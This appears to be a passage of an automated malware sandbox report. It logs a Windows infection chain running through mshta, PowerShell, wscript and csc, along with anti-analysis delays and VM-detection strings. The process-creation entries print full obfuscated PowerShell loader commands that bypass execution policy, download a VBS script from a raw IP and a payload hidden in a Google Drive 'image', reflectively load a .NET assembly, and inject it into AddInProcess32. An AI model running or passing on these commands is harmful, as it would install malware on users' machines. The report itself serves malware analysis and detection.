        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: mshta.exe, 00000000.00000003.1840066342.00000000064F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#
        Source: wscript.exe, 00000006.00000002.1933901803.0000000005830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000006.00000003.1927586937.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1930724969.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1931016865.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1930157651.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1926800003.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1927699862.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1930635013.000000000358C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1927789998.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1926376011.000000000358C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1928263124.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1930348494.0000000003560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mWctmPxgKqemUPO = "LuLxoNRdcPoUimproficienteu"
        Source: powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000001.00000002.2003720720.0000000007581000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2016437348.000000000842B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2003720720.00000000075DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000006.00000002.1933901803.0000000005830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: powershell.exe, 00000001.00000002.2016437348.0000000008443000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6
        Source: wscript.exe, 00000006.00000003.1926587475.0000000005629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mWctmPxgKqemUPO\
        Source: wscript.exe, 00000006.00000003.1927586937.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1930157651.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1926800003.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1927699862.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1927789998.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1928263124.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1928171301.0000000005648000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.1927975569.0000000005648000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mWctmPxgKqemUPO[
        Source: powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 0000000B.00000002.2015792232.0000000006D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell decode and execute
        Source: Yara matchFile source: amsi32_4432.amsi.csv, type: OTHER
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi32_7592.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7592, type: MEMORYSTR
        Bypasses PowerShell execution policy
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExEJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES35E6.tmp" "c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jfqgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagiefezc1uwvbficagicagicagicagicagicagicagicagicagicagicattuvtqkvyzevgsu5pdglvtiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagumhqqvdhvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagifpit0djvsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagiffvlhvpbnqgicagicagicagicagicagicagicagicagicagicagigxzagjqshrzleludfb0ciagicagicagicagicagicagicagicagicagicagicagaik7jyagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicjuawvliiagicagicagicagicagicagicagicagicagicagicaglw5hbwvtcefjzsagicagicagicagicagicagicagicagicagicagicagcnb3wulprnnlecagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjfq6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4xnzyumtqxlzm2l2dvb2r0agluz3n3axroz3jlyxrjb21lymfja3dpdghncmvhdhroawducy50suyilcikru5wokfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmildasmck7c1rhunqtc2xlzvaomyk7u3rhcnqgicagicagicagicagicagicagicagicagicagicagicikzu52okfquerbvefcz29vzhroaw5nc3dpdghncmvhdgnvbwviywnrd2l0agdyzwf0dghpzy52ylmi'+[char]34+'))')))"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnvunraw1hz2vvcmwgpsawverodhrwczovl2ryaxzllmdvb2dszs5jb20vdwm/zxhwb3j0pwrvd25sb2enkydkjysnjmlkptfbsvznskpkdjfgnnztnhnvt3libkgtc0r2vwhcwxd1ciawveq7vunrd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyknsawvuddtvq1fpbwfnzuj5dgvzid0gvunrd2viq2xpzw50lkrvd25sb2fkrgf0yshvq1fpbscrj2fnzvvybck7vunraw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcnkycovunraw1hz2vcexrlcyk7vunrc3rhcnrgbgfnid0gmfrepdxcqvnfnjrfu1rbulq+pjburdtvq1enkydlbmrgbgfnid0gmfrepdxcqvnfnjrfru5epj4wveq7vunrc3rhcnrjbmrleca9ifvduwltywdlvgv4dc5jbmrlee9mkfvduxn0yxj0rmxhzyk7vunrzw5ksw5kzxggpsbvq1fpbwfnzvrlehqusw5kzxhpzihvq1flbmrgbgfnkttvq1fzdccrj2fydeluzgv4ic1nzsawic1hbmqgvunrzw5ksw5kzxgglwd0ifvduxn0yxj0sw5kzxg7vunrc3rhcnrjbmrlecarpsbvq1fzdgfydezsywcutgvuz3roo1vduwjhc2u2nccrj0xlbmd0aca9iccrj1vdjysnuscrj2vuzeluzgv4ic0gvunrc3rhcnrjbmrledtvq1fiyxnlnjrdb21tyw5kiccrjz0gvunraw1hz2vuzxh0lln1ynn0cmluzyhvq1fzdgfydeluzgv4lcbvq1fiyxnlnjrmzw5ndggpo1vduwjhc2u2nfjldmvyc2vkid0glwpvaw4gkfvduwjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbqexogrm9yrwfjac1pymply3qgeybvq1ffih0pwycrjy0xli4tkfvduwjhc2u2nenvbw1hbmqutgvuz3rokv07vunry29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhvq1fiyxnlnjrszxzlcnnlzck7vunrbg9hzgvkqxnzjysnzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkfvduwnvbw1hbmrcexrlcyk7vumnkydrdmfptwv0ag9kid0gw2rubglilklplkhvbscrj2vdlkdlde1ldghvzcgwverwqukwveqpo1vduxzhau1ldghvzc5jbnzva2uojysnvunrjysnbnvsbcwgqcgwver0ehqusutptdayjvnht0wvnjmvmtqxljynkyc3ms4zlji5ms8vonb0dggwveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0axzhzg8wveqsidburgrlc2f0ascrj3zhzg8wveqsidburefkzeluuhjvy2vzczmymfrelcawverkzxnhdgl2ywrvmfrelcawverkzxnhdgl2ywrvmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwnkycwverkzxnhdgl2ywrvjysnmfreldburgrlc2f0axzhzg8wveqsmfrezgvzyxrpdmfkbzburcwwvccrj0qxmfreldburgrlc2f0axzhzccrj28wveqpkscrjzsnks1yrxbsywnfj1vduscsw2niyvjdmzygic1yrxbsywnfjzburccsw2niyvjdmzkgic1yrxbsywnfichby0hhul04mctby0hhul0xmjerw2niyvjdmtiyksxby0hhul0xmjqpihwuicgor0vulxzhuklhqkxliccqbwrykicplm5htuvbmywxmswyxs1kb0lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('ucqimageurl = 0tdhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur 0td;ucqwebclient = new-object system.net.w'+'ebclient;ucqimagebytes = ucqwebclient.downloaddata(ucqim'+'ageurl);ucqimagetext = [system.text.encoding]::utf8.getstring'+'(ucqimagebytes);ucqstartflag = 0td<<base64_start>>0td;ucq'+'endflag = 0td<<base64_end>>0td;ucqstartindex = ucqimagetext.indexof(ucqstartflag);ucqendindex = ucqimagetext.indexof(ucqendflag);ucqst'+'artindex -ge 0 -and ucqendindex -gt ucqstartindex;ucqstartindex += ucqstartflag.length;ucqbase64'+'length = '+'uc'+'q'+'endindex - ucqstartindex;ucqbase64command '+'= ucqimagetext.substring(ucqstartindex, ucqbase64length);ucqbase64reversed = -join (ucqbase64command.tochararray() pyz foreach-object { ucq_ })['+'-1..-(ucqbase64command.length)];ucqcommandbytes = [system.convert]::frombase64string(ucqbase64reversed);ucqloadedass'+'embly = [system.reflection.assembly]::load(ucqcommandbytes);uc'+'qvaimethod = [dnlib.io.hom'+'e].getmethod(0tdvai0td);ucqvaimethod.invoke('+'ucq'+'null, @(0tdtxt.ikol02%sgol/63/141.6'+'71.3.291//:ptth0td, 0tddesativado0td, 0tddesativado0td, 0tddesati'+'vado0td, 0tdaddinprocess320td, 0tddesativado0td, 0tddesativado0td,0tddesativado0td,0tddesativado0td,'+'0tddesativado'+'0td,0tddesativado0td,0tddesativado0td,0t'+'d10td,0tddesativad'+'o0td))'+';')-replace'ucq',[char]36 -replace'0td',[char]39 -replace ([char]80+[char]121+[char]122),[char]124) |. ((get-variable '*mdr*').name[3,11,2]-join'')"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; 